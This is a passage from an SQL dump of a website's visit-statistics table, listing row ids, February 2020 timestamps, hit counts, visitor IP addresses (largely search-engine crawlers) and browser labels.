,1,0,1,0,'66.249.64.28',''),(482878,1582108800,4,4,0,0,'66.249.64.26','chrome'),(482879,1582108954,5,5,0,0,'3.94.202.172','other'),(482880,1582109519,1,1,0,0,'66.249.64.28','chrome'),(482881,1582109593,1,1,0,0,'66.249.64.27','chrome'),(482882,1582109600,1,1,0,0,'66.249.70.62','chrome'),(482883,1582110006,2,2,0,0,'95.213.141.126','opera'),(482884,1582110094,5,5,0,0,'3.94.202.172','other'),(482885,1582110332,2,2,0,0,'178.154.171.134','other'),(482886,1582110553,1,1,0,0,'46.219.6.40','firefox'),(482887,1582110577,1,1,0,0,'91.196.178.76','chrome'),(482888,1582110603,1,1,0,0,'192.162.135.245','chrome'),(482889,1582110774,1,1,0,0,'95.108.213.55','other'),(482890,1582110939,1,0,1,0,'207.46.13.149',''),(482891,1582111006,7,7,0,0,'3.94.202.172','other'),(482892,1582112066,11,11,0,0,'3.94.202.172','other'),(482893,1582112304,2,2,0,0,'66.249.64.28','chrome'),(482894,1582112465,1,1,0,0,'8.29.198.25','other'),(482895,1582112818,2,2,0,0,'178.154.171.134','other'),(482896,1582112828,1,1,0,0,'31.13.127.24','other'),(482897,1582112830,1,1,0,0,'31.13.127.4','other'),(482898,1582112867,1,1,0,0,'66.249.70.62','chrome'),(482899,1582114015,1,1,0,0,'66.249.64.28','chrome'),(482900,1582114063,1,1,0,0,'141.8.142.2','other'),(482901,1582114481,1,1,0,0,'109.74.154.72','chrome'),(482902,1582114921,1,1,0,0,'46.211.132.172','chrome'),(482903,1582114978,1,1,0,0,'178.154.171.134','other'),(482904,1582115309,2,2,0,0,'66.249.64.26','chrome'),(482905,1582115634,1,1,0,0,'207.46.13.149','other'),(482906,1582115763,1,1,0,0,'66.249.64.28','chrome'),(482907,1582116030,1,1,0,0,'37.53.228.153','chrome'),(482908,1582116098,2,2,0,0,'66.249.64.27','chrome'),(482909,1582116234,1,1,0,0,'8.29.198.25','other'),(482910,1582117433,1,1,0,0,'37.53.228.153','chrome'),(482911,1582117500,3,3,0,0,'66.249.64.26','chrome'),(482912,1582117699,1,1,0,0,'66.249.64.28','chrome'),(482913,1582118034,1,1,0,0,'66.249.64.27','chrome'),(482914,1582118775,1,0,1,0,'66.249.64.26',''),(482915,1582118935,1,1,0,0,'66.249.64.28','chrome'),(482916,1582119205,1,1,0,0,'66.249.64.26','chrome'),(482917,1582119495,1,1,0,0,'91.196.177.46','chrome'),(482918,1582119571,2,2,0,0,'178.154.171.134','other'),(482919,1582120405,1,1,0,0,'91.196.177.46','chrome'),(482920,1582120527,1,1,0,0,'31.13.127.21','other'),(482921,1582120942,1,1,0,0,'66.249.64.26','chrome'),(482922,1582121215,3,3,0,0,'178.154.171.134','other'),(482923,1582121533,1,1,0,0,'141.8.142.2','other'),(482924,1582122685,1,1,0,0,'141.8.183.73','other'),(482925,1582122791,5,5,0,0,'66.249.64.27','chrome'),(482926,1582123251,2,2,0,0,'178.154.171.134','other'),(482927,1582123404,2,2,0,0,'66.249.64.28','chrome'),(482928,1582123421,1,1,0,0,'91.196.178.169','chrome'),(482929,1582123548,1,1,0,0,'91.196.178.55','chrome'),(482930,1582123589,1,1,0,0,'8.29.198.25','other'),(482931,1582124018,1,1,0,0,'91.196.178.184','chrome'),(482932,1582124317,1,1,0,0,'78.137.4.226','chrome'),(482933,1582124368,3,3,0,0,'66.249.64.27','chrome'),(482934,1582124456,1,1,0,0,'66.249.64.26','chrome'),(482935,1582125228,1,1,0,0,'80.93.123.47','chrome'),(482936,1582125396,1,1,0,0,'66.249.64.27','chrome'),(482937,1582125506,2,2,0,0,'178.154.171.134','other'),(482938,1582125602,1,1,0,0,'91.196.178.76','chrome'),(482939,1582125757,1,1,0,0,'91.196.178.184','chrome'),(482940,1582126201,1,1,0,0,'66.249.64.28','chrome'),(482941,1582126866,2,2,0,0,'178.154.171.134','other'),(482942,1582127222,1,1,0,0,'8.29.198.25','other'),(482943,1582127362,1,1,0,0,'91.196.178.66','chrome'),(482944,1582127446,2,2,0,0,'178.154.171.127','other'),(482945,1582127651,2,2,0,0,'66.249.64.26','chrome'),(482946,1582127922,1,1,0,0,'66.249.64.27','chrome'),(482947,1582128194,1,1,0,0,'144.91.95.177','chrome'),(482948,1582128529,7,7,0,0,'173.208.218.130','other'),(482949,1582128658,1,1,0,0,'91.196.178.74','firefox'),(482950,1582128878,3,3,0,0,'66.249.64.27','chrome'),(482951,1582129058,1,1,0,0,'207.46.13.91','other'),(482952,1582129761,2,2,0,0,'69.30.202.138','other'),(482953,1582130387,2,2,0,0,'207.46.13.149','other'),(482954,1582130520,2,2,0,0,'66.249.64.28','chrome'),(482955,1582130551,5,5,0,0,'207.46.13.91','other'),(482956,1582130856,4,4,0,0,'178.154.171.134','other'),(482957,1582130965,1,1,0,0,'66.249.64.27','chrome'),(482958,1582131001,1,1,0,0,'178.154.171.127','other'),(482959,1582131515,1,1,0,0,'66.249.64.28','chrome'),(482960,1582131893,1,1,0,0,'178.154.171.134','other'),(482961,1582132207,1,1,0,0,'178.154.171.127','other'),(482962,1582132753,1,1,0,0,'95.133.238.85','chrome'),(482963,1582132837,1,1,0,0,'31.13.103.17','other'),(482964,1582132838,1,1,0,0,'31.13.103.31','other'),(482965,1582132850,1,1,0,0,'69.171.251.43','other'),(482966,1582132947,3,3,0,0,'178.154.171.134','other'),(482967,1582133826,1,1,0,0,'66.249.64.28','chrome'),(482968,1582134146,1,1,0,0,'207.46.13.149','other'),(482969,1582134794,1,1,0,0,'8.29.198.26','other'),(482970,1582134806,1,1,0,0,'66.249.64.26','chrome'),(482971,1582134952,1,1,0,0,'37.57.218.186','firefox'),(482972,1582135022,1,1,0,0,'207.46.13.91','other'),(482973,1582135292,1,0,1,0,'66.249.64.27',''),(482974,1582135713,1,1,0,0,'178.154.171.134','other'),(482975,1582136132,1,1,0,0,'178.154.171.127','other'),(482976,1582136888,1,1,0,0,'207.46.13.91','other'),(482977,1582138192,1,1,0,0,'66.249.64.27','chrome'),(482978,1582138306,1,1,0,0,'8.29.198.25','other'),(482979,1582138311,2,2,0,0,'66.249.64.26','chrome'),(482980,1582138551,1,1,0,0,'66.249.70.33','chrome'),(482981,1582138973,1,1,0,0,'66.249.64.28','chrome'),(482982,1582140335,3,3,0,0,'66.249.64.27','chrome'),(482983,1582140719,1,1,0,0,'66.249.64.28','chrome'),(482984,1582141889,3,3,0,0,'66.249.64.27','chrome'),(482985,1582142196,1,1,0,0,'5.253.206.94','msie'),(482986,1582142423,1,1,0,0,'66.249.64.26','chrome'),(482987,1582144080,2,2,0,0,'66.249.64.27','chrome'),(482988,1582144861,1,1,0,0,'66.249.64.26','chrome'),(482989,1582144926,1,0,1,0,'207.46.13.149',''),(482990,1582146062,1,1,0,0,'178.251.107.244','chrome'),(482991,1582146120,1,1,0,0,'8.29.198.25','other'),(482992,1582146319,1,1,0,0,'66.249.64.26','chrome'),(482993,1582146343,1,1,0,0,'66.249.64.27','chrome'),(482994,1582147665,1,1,0,0,'66.249.64.27','chrome'),(482995,1582147841,1,1,0,0,'91.209.11.236','other'),(482996,1582148757,1,1,0,0,'66.249.64.27','chrome'),(482997,1582149227,1,1,0,0,'66.249.64.26','chrome'),(482998,1582149296,1,1,0,0,'8.29.198.25','other'),(482999,1582149817,1,1,0,0,'66.249.64.28','chrome'),(483000,1582149864,1,1,0,0,'207.46.13.149','other'),(483001,1582152415,1,1,0,0,'66.249.64.27','chrome'),(483002,1582154549,2,2,0,0,'66.249.64.28','chrome'),(483003,1582155928,3,3,0,0,'66.249.64.28','chrome'),(483004,1582156278,2,2,0,0,'66.249.64.27','chrome'),(483005,1582156728,2,2,0,0,'167.99.86.201','other'),(483006,1582157186,1,1,0,0,'8.29.198.27','other'),(483007,1582158620,3,3,0,0,'66.249.64.28','chrome'),(483008,1582158629,1,1,0,0,'66.249.64.27','chrome'),(483009,1582158653,2,2,0,0,'66.249.64.26','chrome'),(483010,1582159152,1,1,0,0,'141.8.183.73','other'),(483011,1582159553,2,2,0,0,'66.249.64.28','chrome'),(483012,1582159944,1,1,0,0,'66.249.70.33','chrome'),(483013,1582160174,1,1,0,0,'62.205.134.182','other'),(483014,1582160284,1,1,0,0,'8.29.198.26','other'),(483015,1582160820,5,5,0,0,'5.9.98.234','other'),(483016,1582160927,2,2,0,0,'178.154.171.134','other'),(483017,1582161178,1,1,0,0,'66.249.64.27','chrome'),(483018,1582163085,1,1,0,0,'51.77.246.205','other'),(483019,1582164519,1,1,0,0,'178.154.171.127','other'),(483020,1582164993,3,3,0,0,'62.4.16.86','other'),(483021,1582165630,1,1,0,0,'141.8.142.2','other'),(483022,1582165738,1,1,0,0,'178.154.171.134','other'),(483023,1582165747,1,1,0,0,'66.249.64.28','chrome'),(483024,1582166737,1,1,0,0,'66.249.64.26','chrome'),(483025,1582167307,1,1,0,0,'178.154.171.134','other'),(483026,1582167837,1,1,0,0,'51.68.152.26','chrome'),(483027,1582167868,1,1,0,0,'157.55.39.181','other'),(483028,1582168252,1,1,0,0,'8.29.198.27','other'),(483029,1582168385,2,2,0,0,'178.154.171.134','other'),(483030,1582170457,2,2,0,0,'157.55.39.181','other'),(483031,1582170500,1,1,0,0,'66.249.64.27','chrome'),(483032,1582171323,1,1,0,0,'8.29.198.27','other'),(483033,1582171344,1,1,0,0,'207.46.13.20','other'),(483034,1582171480,1,1,0,0,'66.249.64.26','chrome'),(483035,1582171751,1,1,0,0,'66.249.64.27','chrome'),(483036,1582171862,1,1,0,0,'66.249.64.28','chrome'),(483037,1582172322,3,3,0,0,'178.154.171.134','other'),(483038,1582172585,3,2,1,0,'157.55.39.181',''),(483039,1582172742,1,1,0,0,'142.44.139.12','firefox'),(483040,1582173857,1,1,0,0,'37.9.113.33','other'),(483041,1582175162,1,1,0,0,'157.55.39.181','other'),(483042,1582175735,1,1,0,0,'66.249.64.28','chrome'),(483043,1582176109,3,3,0,0,'66.249.64.26','chrome'),(483044,1582176430,2,2,0,0,'178.154.171.127','other'),(483045,1582176911,1,1,0,0,'31.13.103.14','other'),(483046,1582176912,1,1,0,0,'31.13.103.5','other'),(483047,1582177121,1,1,0,0,'66.249.64.27','chrome'),(483048,1582177175,1,1,0,0,'62.205.134.182','other'),(483049,1582177457,1,1,0,0,'141.8.142.2','other'),(483050,1582177686,1,1,0,0,'66.249.64.26','chrome'),(483051,1582178346,1,1,0,0,'66.249.64.28','chrome'),(483052,1582179274,1,1,0,0,'8.29.198.25','other'),(483053,1582179661,1,1,0,0,'207.46.13.20','other'),(483054,1582179717,1,1,0,0,'178.154.171.134','other'),(483055,1582180269,1,1,0,0,'66.249.64.27','chrome'),(483056,1582180322,1,1,0,0,'141.8.142.119','other'),(483057,1582180419,1,1,0,0,'141.8.188.25','other'),(483058,1582181206,1,1,0,0,'66.249.64.27','chrome'),(483059,1582181481,1,1,0,0,'94.179.208.140','chrome'),(483060,1582181603,1,1,0,0,'5.253.206.94','msie'),(483061,1582182326,1,1,0,0,'8.29.198.26','other'),(483062,1582182371,1,1,0,0,'69.28.95.127','chrome'),(483063,1582182528,1,1,0,0,'91.196.178.76','chrome'),(483064,1582183145,1,1,0,0,'157.55.39.181','other'),(483065,1582183274,2,2,0,0,'207.46.13.20','other'),(483066,1582183536,2,2,0,0,'198.16.74.45','chrome'),(483067,1582183573,1,1,0,0,'66.249.70.33','chrome'),(483068,1582183722,1,1,0,0,'167.99.54.140','msie'),(483069,1582183861,3,3,0,0,'66.249.70.62','chrome'),(483070,1582184384,1,1,0,0,'91.196.179.25','chrome'),(483071,1582184627,1,1,0,0,'91.196.178.74','chrome'),(483072,1582184810,1,1,0,0,'66.249.64.27','chrome'),(483073,1582184834,1,1,0,0,'66.249.64.26','chrome'),(483074,1582185037,2,2,0,0,'66.249.64.28','chrome'),(483075,1582185039,1,1,0,0,'207.46.13.91','other'),(483076,1582185951,1,1,0,0,'66.249.64.27','chrome'),(483077,1582185995,1,1,0,0,'192.162.133.22','chrome'),(483078,1582186112,1,1,0,0,'178.154.171.134','other'),(483079,1582186841,1,1,0,0,'207.46.13.91','other'),(483080,1582186989,1,1,0,0,'207.46.13.20','other'),(483081,1582188077,1,1,0,0,'66.249.64.28','chrome'),(483082,1582188137,2,2,0,0,'66.249.64.26','chrome'),(483083,1582189928,1,1,0,0,'46.200.69.51','chrome'),(483084,1582190033,1,1,0,0,'91.196.178.76','chrome'),(483085,1582190233,1,1,0,0,'78.111.190.162','chrome'),(483086,1582190321,1,1,0,0,'8.29.198.26','other'),(483087,1582190552,2,2,0,0,'207.46.13.91','other'),(483088,1582190989,1,1,0,0,'178.154.171.134','other'),(483089,1582191045,1,1,0,0,'66.249.64.26','chrome'),(483090,1582192377,1,1,0,0,'207.46.13.20','other'),(483091,1582192658,2,2,0,0,'178.154.171.134','other'),(483092,1582193040,1,1,0,0,'91.196.177.46','chrome'),(483093,1582193362,1,1,0,0,'8.29.198.25','other'),(483094,1582193470,1,1,0,0,'3.12.164.26','chrome'),(483095,1582193728,1,1,0,0,'91.196.178.76','chrome'),(483096,1582193760,1,1,0,0,'66.249.64.28','chrome'),(483097,1582193770,1,1,0,0,'178.154.171.134','other'),(483098,1582194557,1,1,0,0,'91.196.177.147','chrome'),(483099,1582194588,1,1,0,0,'66.249.64.26','chrome'),(483100,1582194873,1,1,0,0,'37.53.228.153','chrome'),(483101,1582195017,1,1,0,0,'178.154.171.134','other'),(483102,1582195105,1,1,0,0,'37.53.184.197','chrome'),(483103,1582195213,1,1,0,0,'66.249.70.62','chrome'),(483104,1582195226,2,1,1,0,'66.249.64.27',''),(483105,1582195649,1,1,0,0,'91.196.177.147','chrome'),(483106,1582196150,1,1,0,0,'178.154.171.127','other'),(483107,1582196400,1,0,1,0,'207.46.13.91',''),(483108,1582196443,1,1,0,0,'178.154.171.134','other'),(483109,1582197082,1,0,1,0,'157.55.39.181',''),(483110,1582197284,1,1,0,0,'95.108.181.104','other'),(483111,1582197420,2,2,0,0,'178.154.171.134','other'),(483112,1582197691,1,1,0,0,'91.193.131.116','chrome'),(483113,1582197857,1,1,0,0,'66.249.64.28','chrome'),(483114,1582198169,1,1,0,0,'109.74.154.72','chrome'),(483115,1582198541,2,2,0,0,'66.249.64.27','chrome'),(483116,1582198671,1,1,0,0,'178.154.171.134','other'),(483117,1582200067,2,2,0,0,'178.154.171.134','other'),(483118,1582200595,2,2,0,0,'193.17.44.18','chrome'),(483119,1582201259,1,1,0,0,'207.46.13.20','other'),(483120,1582201417,1,1,0,0,'178.154.171.134','other'),(483121,1582201513,1,1,0,0,'8.29.198.27','other'),(483122,1582201628,1,1,0,0,'66.249.64.28','chrome'),(483123,1582201695,1,1,0,0,'37.53.228.153','chrome'),(483124,1582202420,1,1,0,0,'31.13.127.20','other'),(483125,1582202422,1,1,0,0,'31.13.127.21','other'),(483126,1582202531,1,1,0,0,'176.96.133.2','chrome'),(483127,1582203394,2,1,1,0,'66.249.64.27',''),(483128,1582203755,1,1,0,0,'66.249.70.36','chrome'),(483129,1582203947,1,1,0,0,'178.154.171.127','other'),(483130,1582204310,1,1,0,0,'207.46.13.91','other'),(483131,1582204367,1,1,0,0,'134.249.185.99','chrome'),(483132,1582204377,1,1,0,0,'8.29.198.25','other'),(483133,1582204558,1,1,0,0,'178.154.171.134','other'),(483134,1582205640,1,1,0,0,'178.154.171.127','other'),(483135,1582205689,3,3,0,0,'178.154.171.134','other'),(483136,1582206070,3,3,0,0,'62.4.16.86','other'),(483137,1582206512,1,1,0,0,'207.46.13.91','other'),(483138,1582206775,2,2,0,0,'178.154.171.134','other'),(483139,1582207199,1,1,0,0,'91.196.177.147','chrome'),(483140,1582207867,1,1,0,0,'141.8.142.115','other'),(483141,1582208154,1,1,0,0,'141.8.142.2','other'),(483142,1582208190,2,2,0,0,'141.8.142.164','other'),(483143,1582208203,1,1,0,0,'92.113.127.123','chrome'),(483144,1582208236,2,2,0,0,'66.249.64.26','chrome'),(483145,1582208524,1,1,0,0,'207.46.13.91','other'),(483146,1582208674,1,1,0,0,'95.108.213.55','other'),(483147,1582209003,1,1,0,0,'141.8.183.73','other'),(483148,1582209132,1,1,0,0,'66.249.64.28','chrome'),(483149,1582209196,1,1,0,0,'31.13.127.22','other'),(483150,1582209599,1,1,0,0,'207.46.13.20','other'),(483151,1582209689,1,1,0,0,'66.249.64.27','chrome'),(483152,1582209812,1,1,0,0,'178.154.171.127','other'),(483153,1582209940,1,1,0,0,'141.8.183.73','other'),(483154,1582210266,1,1,0,0,'91.196.178.76','chrome'),(483155,1582210321,1,0,1,0,'207.46.13.91',''),(483156,1582210491,2,2,0,0,'178.154.171.134','other'),(483157,1582210520,1,1,0,0,'207.46.13.20','other'),(483158,1582210613,1,1,0,0,'91.196.178.145','firefox'),(483159,1582210951,2,2,0,0,'66.249.64.27','chrome'),(483160,1582211480,1,1,0,0,'141.8.183.33','other'),(483161,1582211676,1,1,0,0,'178.154.171.66','other'),(483162,1582211679,1,1,0,0,'141.8.183.111','other'),(483163,1582212186,5,5,0,0,'178.154.171.134','other'),(483164,1582212590,1,1,0,0,'178.154.171.127','other'),(483165,1582212646,1,1,0,0,'8.29.198.25','other'),(483166,1582212669,1,1,0,0,'66.249.64.27','chrome'),(483167,1582212903,1,1,0,0,'207.46.13.20','other'),(483168,1582212910,1,1,0,0,'91.196.178.187','chrome'),(483169,1582212969,1,1,0,0,'141.8.183.73','other'),(483170,1582213065,1,1,0,0,'66.249.64.26','chrome'),(483171,1582213279,1,1,0,0,'141.8.142.119','other'),(483172,1582213947,1,1,0,0,'91.196.178.70','firefox'),(483173,1582214097,1,1,0,0,'207.46.13.20','other'),(483174,1582214303,1,1,0,0,'66.249.64.26','chrome'),(483175,1582214333,2,2,0,0,'178.154.171.127','other'),(483176,1582214848,3,3,0,0,'178.154.171.134','other'),(483177,1582215382,1,1,0,0,'8.29.198.27','other'),(483178,1582215756,2,2,0,0,'66.249.64.26','chrome'),(483179,1582215895,1,1,0,0,'178.154.171.134','chrome'),(483180,1582215906,1,1,0,0,'207.46.13.20','other'),(483181,1582216080,5,5,0,0,'31.13.127.7','other'),(483182,1582216081,4,4,0,0,'31.13.127.11','other'),(483193,1582216082,1,1,0,0,'31.13.127.18','other'),(483197,1582216083,1,1,0,0,'31.13.127.26','other'),(483199,1582216119,1,1,0,0,'178.154.171.134','other'),(483200,1582216377,1,1,0,0,'207.46.13.91','other'),(483201,1582216567,1,1,0,0,'178.154.171.127','other'),(483202,1582216837,1,1,0,0,'66.249.70.62','chrome'),(483203,1582217222,1,1,0,0,'178.154.171.134','other'),(483204,1582217454,1,1,0,0,'94.153.104.169','chrome'),(483205,1582217474,1,1,0,0,'141.8.142.2','other'),(483206,1582218123,1,0,1,0,'66.249.64.27',''),(483207,1582218828,2,2,0,0,'178.154.171.134','other'),(483208,1582219046,1,0,1,0,'207.46.13.20',''),(483209,1582219173,1,1,0,0,'37.145.137.42','other'),(483210,1582219588,1,1,0,0,'66.249.64.26','chrome'),(483211,1582219648,1,1,0,0,'66.249.70.33','chrome'),(483212,1582219711,2,2,0,0,'141.8.142.2','other'),(483213,1582219853,1,1,0,0,'66.249.64.28','chrome'),(483214,1582219897,1,1,0,0,'178.154.171.127','other'),(483215,1582219942,3,3,0,0,'178.154.171.134','other'),(483216,1582220304,1,1,0,0,'207.46.13.20','other'),(483217,1582220642,1,1,0,0,'31.13.103.24','other'),(483219,1582220697,1,1,0,0,'141.8.142.115','other'),(483220,1582220828,1,1,0,0,'157.55.39.181','other'),(483221,1582221056,1,1,0,0,'95.108.181.104','other'),(483222,1582221058,1,1,0,0,'141.8.183.73','other'),(483223,1582221289,2,2,0,0,'178.154.171.127','other'),(483224,1582221356,4,4,0,0,'178.154.171.134','other'),(483225,1582221523,1,1,0,0,'66.249.64.26','chrome'),(483226,1582221739,1,1,0,0,'66.249.64.27','chrome'),(483227,1582222273,1,1,0,0,'157.55.39.181','other'),(483228,1582222944,1,0,1,0,'207.46.13.20',''),(483229,1582223228,1,1,0,0,'66.249.64.26','chrome'),(483230,1582223317,2,2,0,0,'207.46.13.91','other'),(483231,1582223415,1,1,0,0,'173.252.111.9','other'),(483232,1582223833,1,1,0,0,'8.29.198.27','other'),(483233,1582223913,1,1,0,0,'66.249.64.28','chrome'),(483234,1582223980,2,2,0,0,'157.55.39.181','other'),(483235,1582224186,1,1,0,0,'207.46.13.20','other'),(483236,1582224289,2,2,0,0,'178.154.171.127','other'),(483237,1582224357,2,2,0,0,'173.252.111.15','other'),(483238,1582224358,1,1,0,0,'173.252.111.8','other'),(483241,1582225208,6,6,0,0,'178.154.171.134','other'),(483242,1582225367,1,1,0,0,'66.249.64.27','chrome'),(483243,1582225384,1,1,0,0,'157.55.39.181','other'),(483244,1582226035,1,1,0,0,'178.154.171.127','other'),(483245,1582226135,4,4,0,0,'178.154.171.134','other'),(483246,1582226388,1,1,0,0,'8.29.198.27','other'),(483247,1582226749,1,1,0,0,'66.249.64.28','chrome'),(483248,1582227604,2,2,0,0,'157.55.39.181','other'),(483249,1582227895,2,2,0,0,'178.154.171.127','other'),(483250,1582228196,1,1,0,0,'54.208.102.37','other'),(483251,1582228198,1,1,0,0,'107.21.1.8','other'),(483252,1582228212,2,2,0,0,'178.154.171.134','other'),(483253,1582228487,1,1,0,0,'207.46.13.20','other'),(483254,1582229572,1,1,0,0,'178.154.171.134','other'),(483255,1582229809,1,1,0,0,'141.8.183.111','other'),(483256,1582230042,1,1,0,0,'66.249.70.36','chrome'),(483257,1582230427,1,1,0,0,'141.8.183.100','other'),(483258,1582230472,1,1,0,0,'66.249.64.26','chrome'),(483259,1582231041,1,1,0,0,'141.8.142.115','other'),(483260,1582231489,1,1,0,0,'66.249.64.26','chrome'),(483261,1582231709,1,1,0,0,'178.154.171.127','other'),(483262,1582231835,2,2,0,0,'207.46.13.20','other'),(483263,1582231873,1,1,0,0,'207.46.13.91','other'),(483264,1582231981,1,1,0,0,'138.246.253.5','chrome'),(483265,1582232457,1,1,0,0,'66.249.64.27','chrome'),(483266,1582232531,2,2,0,0,'178.154.171.134','other'),(483267,1582232740,2,2,0,0,'178.154.171.127','other'),(483268,1582233134,1,1,0,0,'207.46.13.91','other'),(483269,1582233837,1,1,0,0,'207.46.13.20','other'),(483270,1582234039,2,2,0,0,'178.154.171.134','other'),(483271,1582234073,1,1,0,0,'37.9.113.163','other'),(483272,1582234371,1,1,0,0,'207.46.13.91','other'),(483273,1582234685,2,2,0,0,'178.154.171.127','other'),(483274,1582234890,1,1,0,0,'8.29.198.26','other'),(483275,1582234944,1,1,0,0,'178.154.171.134','other'),(483276,1582235600,1,1,0,0,'66.249.70.62','chrome'),(483277,1582235921,1,1,0,0,'66.249.64.27','chrome'),(483278,1582236114,2,2,0,0,'178.154.171.134','other'),(483279,1582236291,1,1,0,0,'178.154.171.127','other'),(483280,1582237131,1,1,0,0,'66.249.64.28','chrome'),(483281,1582237495,1,1,0,0,'178.154.171.127','other'),(483282,1582237514,1,0,1,0,'66.249.64.26',''),(483283,1582237588,1,1,0,0,'8.29.198.26','other'),(483284,1582237927,2,2,0,0,'66.249.64.27','chrome'),(483285,1582238172,2,2,0,0,'178.154.171.134','other'),(483286,1582238317,1,1,0,0,'141.8.142.2','other'),(483287,1582238383,1,0,1,0,'207.46.13.20',''),(483288,1582238575,2,2,0,0,'178.154.171.127','other'),(483289,1582239381,3,3,0,0,'178.154.171.134','other'),(483290,1582239933,1,1,0,0,'207.46.13.20','other'),(483291,1582239939,1,1,0,0,'178.154.171.127','other'),(483292,1582240491,1,1,0,0,'66.249.64.27','chrome'),(483293,1582240589,2,2,0,0,'178.154.171.134','other'),(483294,1582241019,1,1,0,0,'207.46.13.91','other'),(483295,1582241804,2,2,0,0,'178.154.171.134','other'),(483296,1582243014,1,1,0,0,'66.249.70.33','chrome'),(483297,1582243345,1,1,0,0,'207.46.13.91','other'),(483298,1582243433,1,1,0,0,'178.154.171.134','other'),(483299,1582243552,1,1,0,0,'66.249.70.62','chrome'),(483300,1582244373,1,1,0,0,'207.46.13.20','other'),(483301,1582244491,1,1,0,0,'66.249.70.62','chrome'),(483302,1582245453,1,1,0,0,'207.46.13.91','other'),(483303,1582245930,1,1,0,0,'66.249.64.27','chrome'),(483304,1582245976,1,1,0,0,'8.29.198.26','other'),(483305,1582246208,1,1,0,0,'207.46.13.20','other'),(483306,1582246513,1,1,0,0,'62.205.134.182','other'),(483307,1582247078,1,1,0,0,'66.249.64.26','chrome'),(483308,1582247171,1,1,0,0,'66.249.64.28','chrome'),(483309,1582248601,1,1,0,0,'8.29.198.25','other'),(483310,1582248970,1,1,0,0,'66.249.70.46','chrome'),(483311,1582249394,1,1,0,0,'66.249.64.26','chrome'),(483312,1582250500,1,1,0,0,'66.249.64.26','chrome'),(483313,1582250880,1,1,0,0,'178.154.171.127','other'),(483314,1582250894,1,1,0,0,'66.249.64.28','chrome'),(483315,1582250955,1,1,0,0,'66.249.64.27','chrome'),(483316,1582252144,1,1,0,0,'66.249.64.27','chrome'),(483317,1582252286,1,1,0,0,'66.249.64.26','chrome'),(483318,1582252845,1,1,0,0,'207.46.13.91','other'),(483319,1582253523,1,1,0,0,'207.46.13.20','other'),(483320,1582256404,2,2,0,0,'66.249.64.27','chrome'),(483321,1582257045,1,1,0,0,'8.29.198.27','other'),(483322,1582257138,1,1,0,0,'207.46.13.91','other'),(483323,1582258110,1,1,0,0,'66.249.70.62','chrome'),(483324,1582258276,1,1,0,0,'66.249.64.28','chrome'),(483325,1582258596,1,1,0,0,'66.249.64.26','chrome'),(483326,1582258752,2,1,1,0,'66.249.64.27',''),(483327,1582259384,1,1,0,0,'66.249.64.28','chrome'),(483328,1582259574,1,1,0,0,'8.29.198.26','other'),(483329,1582259961,1,1,0,0,'66.249.64.27','chrome'),(483330,1582261781,1,1,0,0,'66.249.70.33','chrome'),(483331,1582261792,1,1,0,0,'66.249.64.28','chrome'),(483332,1582261864,1,1,0,0,'207.46.13.20','other'),(483333,1582262146,2,2,0,0,'141.8.142.2','other'),(483334,1582262246,1,1,0,0,'66.249.64.27','chrome'),(483335,1582263124,2,2,0,0,'178.154.171.134','other'),(483336,1582263508,1,1,0,0,'66.249.64.27','chrome'),(483337,1582263553,1,1,0,0,'62.205.134.182','other'),(483338,1582264257,3,3,0,0,'207.46.13.225','other'),(483339,1582264309,2,2,0,0,'178.154.171.127','other'),(483340,1582265632,1,1,0,0,'31.13.127.7','other'),(483341,1582265634,1,1,0,0,'31.13.127.21','other'),(483342,1582265974,2,2,0,0,'178.154.171.127','other'),(483343,1582266357,1,1,0,0,'17.58.101.25','other'),(483344,1582266399,1,1,0,0,'178.154.171.134','other'),(483345,1582266991,2,2,0,0,'141.8.183.73','other'),(483346,1582267085,1,1,0,0,'91.196.178.76','chrome'),(483347,1582268050,1,1,0,0,'8.29.198.27','other'),(483348,1582268119,1,1,0,0,'66.249.70.36','chrome'),(483349,1582268223,1,1,0,0,'66.249.64.26','chrome'),(483350,1582268880,3,3,0,0,'178.154.171.134','other'),(483351,1582268991,1,1,0,0,'95.216.96.254','other'),(483352,1582269286,1,1,0,0,'178.154.171.127','other'),(483353,1582269955,1,1,0,0,'178.154.171.134','other'),(483354,1582270218,2,2,0,0,'66.249.64.28','chrome'),(483355,1582270363,1,1,0,0,'66.249.64.26','chrome'),(483356,1582270400,3,3,0,0,'178.154.171.127','other'),(483357,1582270429,1,1,0,0,'37.143.91.193','chrome'),(483358,1582270488,1,1,0,0,'212.26.139.194','chrome'),(483359,1582270549,1,1,0,0,'8.29.198.26','other'),(483360,1582271180,1,1,0,0,'209.17.96.242','other'),(483361,1582271347,1,1,0,0,'141.8.142.2','other'),(483362,1582271374,1,1,0,0,'141.8.183.53','other'),(483363,1582271629,1,1,0,0,'95.108.213.55','other'),(483364,1582271705,1,1,0,0,'178.154.171.134','other'),(483365,1582272057,1,1,0,0,'141.8.132.2','other'),(483366,1582272317,2,2,0,0,'207.46.13.20','other'),(483367,1582272571,1,1,0,0,'77.111.244.231','chrome'),(483368,1582272687,1,1,0,0,'141.8.183.53','other'),(483369,1582272911,1,1,0,0,'141.8.183.100','other'),(483370,1582273391,2,2,0,0,'207.46.13.20','other'),(483371,1582273496,2,2,0,0,'207.46.13.225','other'),(483372,1582273892,1,1,0,0,'66.249.64.26','chrome'),(483373,1582275179,1,1,0,0,'178.154.171.127','other'),(483374,1582275684,1,1,0,0,'207.46.13.20','other'),(483375,1582275777,1,1,0,0,'37.9.113.177','other'),(483376,1582275821,1,1,0,0,'141.8.142.164','other'),(483377,1582275954,1,1,0,0,'95.135.13.29','firefox'),(483378,1582276629,1,1,0,0,'66.249.64.26','chrome'),(483379,1582276821,1,1,0,0,'141.8.188.12','other'),(483380,1582276984,1,1,0,0,'178.154.171.134','other'),(483381,1582277563,1,1,0,0,'5.45.207.49','other'),(483382,1582277566,1,1,0,0,'141.8.183.15','other'),(483383,1582277819,1,1,0,0,'46.164.145.46','chrome'),(483384,1582277912,4,4,0,0,'66.249.64.26','chrome'),(483385,1582278014,1,1,0,0,'66.249.64.27','chrome'),(483386,1582278131,1,1,0,0,'178.154.171.66','other'),(483387,1582278260,1,1,0,0,'66.249.64.28','chrome'),(483388,1582279012,1,1,0,0,'8.29.198.26','other'),(483389,1582280000,1,1,0,0,'51.77.231.180','chrome'),(483390,1582280145,3,3,0,0,'66.249.64.26','chrome'),(483391,1582280300,2,2,0,0,'141.8.188.12','other'),(483392,1582280424,1,1,0,0,'18.218.108.31','chrome'),(483393,1582280665,1,1,0,0,'141.8.142.44','other'),(483394,1582281124,2,2,0,0,'95.108.181.104','other'),(483395,1582281185,1,1,0,0,'141.8.183.53','other'),(483396,1582281507,1,1,0,0,'5.45.207.49','other'),(483397,1582281523,1,1,0,0